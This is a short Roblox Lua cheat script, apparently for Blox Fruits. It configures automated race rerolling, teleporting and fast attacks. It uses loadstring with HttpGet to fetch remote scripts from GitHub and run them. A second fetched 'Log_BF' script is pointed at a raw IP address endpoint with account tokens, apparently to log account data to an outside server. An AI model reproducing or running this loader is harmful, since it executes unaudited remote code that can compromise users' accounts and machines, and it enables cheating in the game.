getgenv().Kusnokix = {
    ["LockedRace"] = {
        ["Enabled"] = true,
        ["Rerace until fragments"] = 4000,
        ["Enable rerace until fragments"] = true,
        ["Race"] = {
            "Cyborg"
        },
        ["Reroll when evo"] = false,
        ["Teleport to island"] = true,
        ["PosTeleport"] = CFrame.new(100, 100, 616),
        ["Auto Find Fragments"] = false,
        ["Minimum Fragments"] = 30000,
        ["Helper Skypiea"] = {},
        ["Helper Ghoul"] = {},
        ["Helper Auto Enbale PVP"] = true,
        ["Helper Teleport to pos"] = true,
        ["AutoFindPlayer"] = false
    },
    ["Auto Evo Race"] = true,
    ["Fast Attack"] = {
        ["Duration"] = 2,
        ["Delay"] = .3
    }
}
loadstring(game:HttpGet "https://raw.githubusercontent.com/Hiromabashi/loader/refs/heads/main/26a2a9cb5a0d8b04e91dbfbc08d6ac46.lua") { function(...) end, "03f1fb2f-490d-4b16-a07b-e952561e3d88", "old"}

task.spawn(function()
repeat task.wait() until game:IsLoaded()
__script__host = "http://45.136.254.74/api/account"
__script__token = "PC-1"
__script__machine = "PC-9"
loadstring(game:HttpGet'https://raw.githubusercontent.com/ooboor005/Log_BF/main/Log_BF.lua'){__script__host, __script__token, __script__machine}
end)
